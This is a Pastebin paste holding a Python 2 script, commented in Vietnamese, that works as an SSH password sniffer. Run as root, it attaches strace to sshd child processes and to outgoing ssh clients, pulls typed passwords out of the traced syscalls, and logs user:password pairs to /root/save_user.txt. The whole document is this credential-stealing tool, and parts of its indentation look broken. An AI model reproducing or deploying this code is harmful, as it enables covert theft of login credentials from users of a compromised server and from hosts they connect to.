API tools faq
paste
Advertisement
Guest User

123123123123123

a guest
Jan 29th, 2018
205
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.10 KB | None | 0 0
raw download clone embed print report
  1. import subprocess,thread,time,os
  2.  
  3. def get_sub(pid): """lay pid con cua mot pid duoc truyen vao"""
  4.     pipe = subprocess.Popen("pgrep -P "+pid,shell=True,stdout=subprocess.PIPE).stdout
  5.     tmp=pipe.read().split("\n")
  6.     return tmp[:len(tmp)-1:]
  7. """ """
  8. def split_pw(str):
  9.     x=str.index("(")+1;
  10.     y=str.index(",");
  11.     bg=str[x:y:]
  12.     x=str[::-1].index("=");
  13.     ed=str[len(str)-x::]
  14.     x=str.index("\"")+1;
  15.     y=str[x::].index("\"")+x;
  16.     pw=str[y-1:x:-1]
  17.     pw=pw[:int(ed)-int(bg):]
  18.     return pw[::-1]
  19.  
  20. def get_user(pid):
  21.     term="ps aux | grep "+pid+" | grep priv"
  22.     pipe=subprocess.Popen(term,shell=True,stdout=subprocess.PIPE).stdout
  23.     user=pipe.read().split("\n")[0].replace(" ","")
  24.     x=user.index("sshd:")+5
  25.     y=user.index("[")
  26.     return user[x:y:]
  27. """
  28. root 24360  0.0  0.6  94896  6912 ?  Ss   02:34   0:00 sshd: taind [priv]
  29. """
  30. def save(user,pw,str):
  31.     file="/root/save_user.txt"
  32.     f=open(file,"a")
  33.     f.write(str+": "+user+":"+pw+"\n")
  34.     f.close()
  35. def strace_passwd(pid):
  36.     global straced,root_pid,stracing
  37.     if pid not in stracing:
  38.         stracing.append(pid)
  39.     pw=""
  40.     file=str(int(time.time()))+".sshd" """ tao file"""
  41.     straced.append(pid)
  42.     sub_pw="".join(get_sub(pid))
  43.     strace_cmd="strace -p "+sub_pw+" -e trace=write -o "+file
  44.     os.system(strace_cmd)
  45.     result=open(file,"r").read()
  46.     os.system("rm -rf "+file)
  47.     if "exited with 0" in result:
  48.         result=result.split("\n")
  49.         pw=split_pw(result[len(result)-7].replace(" ",""))
  50.         save(get_user(pid),pw,"Client to Server")
  51.     set_straced(root_pid)
  52.     stracing.remove(pid)
  53.  
  54. def strace_sub(root_pid):
  55.     global sub_pid
  56.     while True:
  57.         sub_pid=get_sub(root_pid)
  58.  
  59. def set_straced(pid): """truyen vao pid va lay subprocess id"""
  60.     global straced
  61.     straced=get_sub(pid)
  62. def get_user_ssh(pid):
  63.     usr=""
  64.     term="ps aux | grep "+pid+" | grep 'ssh '"
  65.         pipe=subprocess.Popen(term,shell=True,stdout=subprocess.PIPE).stdout
  66.         user=pipe.read().split("\n")[0].split(" ")
  67.     if "@" not in user[len(user)-1]:
  68.         usr=user[0]+"@"+user[len(user)-1]
  69.     else:
  70.         usr=user[len(user)-1]
  71.     return usr
  72. def get_pw_ssh(str):
  73.     pw=[];
  74.     passwd="";
  75.     user=""
  76.     str=str.replace(" ","").split("\n")
  77.     str=str[:len(str)-9:]
  78.     for i in str[::-1]:
  79.         if "password:" in i:
  80.             break
  81.         pw.append(i)
  82.     for i in pw[::-1]:
  83.         if "=1"in i:
  84.             x=i.index("\"")+1;y=i[x::].index("\"")+x
  85.             if i[x:y:]!="\\n":
  86.                 passwd+=i[x:y:]
  87.     return passwd
  88.  
  89. def readfile(file,subpro,pid):
  90.     while True:
  91.         result=open(file,"r").read()
  92.         if "exited with 255" in result:
  93.             subpro.kill()
  94.             os.system("rm -rf "+file)
  95.             break
  96.         if "Welcome to" in result:
  97.             _pw=get_pw_ssh(result);_usr=get_user_ssh(pid)
  98.             subpro.kill()
  99.             os.system("rm -rf "+file)
  100.             save(_usr,_pw,"Server to another")
  101.             break
  102.  
  103. def control_ssh(pid):
  104.     global sniffing
  105.     file1=str(int(time.time()))+".ssh"
  106.     open(file1,"w")
  107.     pw_ssh="strace -p "+pid+" -e trace=read,write -o "+file1
  108.     p = subprocess.Popen(pw_ssh,shell=True,stdout=subprocess.PIPE)
  109.     readfile(file1,p,pid)
  110.  
  111. def get_sshn():
  112.     global ssh_n
  113.     while True:
  114.         pipe = subprocess.Popen("pidof ssh",shell=True,stdout=subprocess.PIPE).stdout
  115.         ssh_n=pipe.read().replace("\n","").split(" ") """lay pid cua ssh"""
  116. def sniff_ssh():
  117.     global ssh_c,ssh_n,sniffing
  118.     thread.start_new_thread(get_sshn,())
  119.     while True:
  120.         for i in ssh_n:
  121.             if i not in sniffed and i not in sniffing and i != "":
  122.                 sniffing.append(i)
  123.                 thread.start_new_thread(control_ssh,(i,))
  124.  
  125.  
  126. pipe = subprocess.Popen("pidof sshd",shell=True,stdout=subprocess.PIPE).stdout """lay pid cua daemon sshd"""
  127. pid =  pipe.read().replace("\n","").split(" ")
  128. root_pid=pid[len(pid)-1]
  129. sub_pid=[];
  130. stracing=[];
  131. straced=[];
  132. set_straced(root_pid) """pid cua subprocess"""
  133.  
  134. ssh_n=[]; """list ssh id"""
  135. sniffed=[]; """list da sniff"""
  136. sniffing=[] """list dang sniff"""
  137. pipe = subprocess.Popen("pidof ssh",shell=True,stdout=subprocess.PIPE).stdout """lay pid cua ssh dang chay"""
  138. sniffed=pipe.read().replace("\n","").split(" ")
  139. thread.start_new_thread(sniff_ssh,())
  140.  
  141. thread.start_new_thread(strace_sub,(root_pid,))
  142. while True:
  143.     tmp_sub=get_sub(root_pid)
  144.     for i in tmp_sub:
  145.         if i not in straced and i not in stracing:
  146.             thread.start_new_thread(strace_passwd,(i,))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!